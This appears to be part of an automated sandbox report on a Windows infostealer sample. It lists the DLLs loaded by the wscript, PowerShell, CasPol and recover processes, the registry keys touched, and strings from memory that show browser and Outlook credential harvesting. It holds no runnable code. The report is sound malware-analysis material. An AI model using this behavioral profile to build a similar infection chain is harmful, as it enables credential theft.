Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: moshost.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mapsbtsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mosstorage.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ztrace_maps.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ztrace_maps.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mapconfiguration.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ztrace_maps.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\recover.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Jump to behavior

Source:	Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.mdrawmethodimplrowdnlib.dotnet.pdbpdbimpltype source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1092678242.00000000077F0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: `1dnlib.dotnet.emitexceptionhandlertypednlib.dotnet.pdb.managedsymbolreadercreatordnlib.dotnetmoduledefuserdnlib.dotnetgenericparamconstraintuserdnlib.dotnetparamdefdnlib.dotnet.mdrawtypedefrowdnlib.dotnet.resourcescreateresourcedatadelegatednlib.dotnetvtableflagsdnlib.dotnet.mdrawinterfaceimplrowdnlib.dotnet.writeriheapdnlib.dotnet.mdmetadataheaderdnlib.dotnet.mdrawmodulerowdnlib.dotnetimdtokenprovidermddnlib.pervadnlib.dotnet.writermodulewriteroptionsbase source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: >.CurrentSystem.Collections.IEnumerator.CurrentSystem.Collections.Generic.IEnumerator<System.Int32>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.UInt32,System.Byte[]>>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,System.String>>.get_CurrentSystem.Collections.Generic.IEnumerator<T>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CustomAttribute>.get_CurrentSystem.Collections.Generic.IEnumerator<TValue>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.FieldDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MethodDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.EventDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.ModuleRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MemberRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyRef>.get_CurrentSystem.Collections.Generic.IEnumerator<System.String>.get_CurrentSystem.Collections.Generic.IEnumerator<TIn>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.TaskFolder>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.Trigger>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CANamedArgument>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MD.IRawRow>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyResolver. source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: CasPol.exe, 00000008.00000002.3469653795.0000000004540000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000009.00000002.1150649991.0000000000400000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managedpdbexception source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: `2dnlib.dotnet.pdb.dssisymunmanagedwriter2microsoft.win32.taskschedulernotsupportedpriortoexceptiondnlib.dotnetmodulerefuserdnlib.dotnet.mddotnetstreamdnlib.dotnet.writerusheapdnlib.dotnet.pdbimage_debug_directorydnlib.dotnet.writermdtable`1microsoft.win32.taskschedulermaintenancesettingsdnlib.dotnet.writercreatepdbsymbolwriterdelegatemicrosoft.win32.taskschedulertaskrightsdnlib.dotnet.writermodulewriterexceptiondnlib.dotnet.pdb.managedpdbreaderdnlib.dotnetparamattributesdnlib.dotnet.writerhotheapdnlib.dotnettypedeforrefsigdnlib.dotnettypenameparserexceptiondnlib.dotnetexportedtypeuserdnlib.dotnet.emitcilbodydnlib.dotnet.writersignaturewriterdnlib.dotnetmethodspecuserdnlib.dotnetvtablemicrosoft.win32.taskscheduler.fluentintervaltriggerbuildermicrosoft.win32.taskschedulernotv2supportedexceptiondnlib.dotnetcanamedargumentdnlib.dotnet.emitmethodutilsdnlib.dotnet.writerblobheapdnlib.dotnet.pdbpdbstateelemdnlib.dotnetresolveexceptiondnlib.dotnet.resourcesresourceelementsetdnlib.dotnetifielddnlib.dotnet.mdrawconstantrowdnlib.dotnet.resourcesuserresourcetypemicrosoft.win32.taskschedulerregistrationtriggerdnlib.dotneteventequalitycomparertaskprincipalprivilegesenumeratordnlib.dotnettypespecdnlib.dotnet.emitopcodesmicrosoft.win32.taskschedulernamevaluepairmicrosoft.win32.taskschedulertaskaccessrulednlib.dotnet.mdtablednlib.dotnetihassemanticmicrosoft.win32.taskschedulertaskprocesstokensidtypemicrosoft.win32.taskschedulertaskcollectiondnlib.dotnetpinnedsigdnlib.dotnetmanifestresourcednlib.dotnet.emitinvalidmethodexceptiondnlib.dotnet.mdrawmodulerefrow<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.w32resourcesresourcename<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.dotnet.emitinstructiondnlib.dotnet.emitflowcontroldnlib.dotnetiresolverdnlib.dotnetassemblyrefdnlib.dotnet.writerhotheap20microsoft.win32.taskschedulerweeklytriggerdnlib.dotnetptrsigdnlib.dotnet.resourcesresourcetypecodemicrosoft.win32.taskscheduler.fluentsettingsbuilderdnlib.dotnet.mdrawpropertymaprowdnlib.dotnet.mdirowreader`1microsoft.win32.taskschedulertasktriggertypednlib.dotnet.mdcolumninfodnlib.dotnetnonleafsigdnlib.dotnetcallingconventionsigmicrosoft.win32.taskscheduleridlesettingsdnlib.dotnet.writeruniquechunklist`1dnlib.dotnetsigcompareroptionsdnlib.dotnetassemblydefdnlib.ioifilesectiondnlib.dotnetsignaturereadermicrosoft.win32.taskschedulerlogontriggerdnlib.dotnet.mdrawimplmaprowdnlib.dotnetimemberrefdnlib.dotnet.writerbytearraychunkdnlib.dotnetarraymarshaltypednlib.pesubsystemdnlib.dotnetassemblylinkedresourcednlib.dotnetcmodoptsigdnlib.dotnet.mdmdtablednlib.dotnetlocalsigdnlib.dotnetimemberdefdnlib.dotnetfixedarraymarshaltypemicrosoft.win32.taskschedulercomhandleractiondnlib.dotnetmoduledefmd2dnlib.dotnet.emitdynamicmethodbodyreaderdnlib.dotnetclasslayoutuserdnlib.dotnetmethodsigtokentypemicrosoft.win32.taskschedulermonthlytriggerdnlib.peipeimagednlib.dotnet.mdrawfilerowdnlib.dotnet.writerhotheap40dnlib.dotnetmodifiersigdnlib.dotnetfullnamecreatordnlib.dotnet.emitnativemethodbodydnlib.
Source:	Binary string: `5dnlib.dotnetdeclsecuritydnlib.dotnet.writermdtablewriterdnlib.dotnetparamdefuserdnlib.dotnetframeworkredirectdnlib.dotnet.mdguidstreamdnlib.dotnet.writernativemodulewriteroptionsmemorymappedionotsupportedexceptiondnlib.dotnetmemberfindermicrosoft.win32.taskschedulertaskeventwatchermicrosoft.win32.taskschedulermonthsoftheyeardnlib.dotnetgenericinstsigmicrosoft.win32.taskschedulertaskservicednlib.dotnet.pdbsymbolwritercreatordnlib.dotnetihasconstantdnlib.peimagefileheaderdnlib.dotnetmethodsemanticsattributesdnlib.dotnetfileattributesdnlib.dotnetityperesolverdnlib.dotnetimplmapuserdnlib.dotnetmdtokensystem.runtime.compilerservicesextensionattributednlib.dotnet.writerichunkdnlib.dotnetmethodattributesdnlib.dotnet.writeriwritererrordnlib.dotnet.resourcesuserresourcedatadnlib.dotnetnullresolverdnlib.dotnet.writerstringsheapdnlib.dotnet.writerpeheadersdnlib.dotnetimplmapdnlib.dotnet.pdb.dssisymunmanageddocumentwriterdnlib.dotnet.mdheaptypednlib.dotnetidnlibdefdnlib.dotnetcustomattributemicrosoft.win32.taskscheduler.fluentactionbuilderdnlib.dotnet.mdrawmemberrefrowdnlib.utilsmfunc`3dnlib.dotnet.mdrawexportedtyperowdnlib.dotnet.writermethodbodywriterbasednlib.dotnetgenericvardnlib.dotnetimemberrefparentdnlib.dotnetiownermodulednlib.dotnetpropertysigbioscharacteristicsmicrosoft.win32.taskscheduleritriggerdelaydnlib.dotnet.mdrawfieldmarshalrow source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1092678242.00000000077F0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp
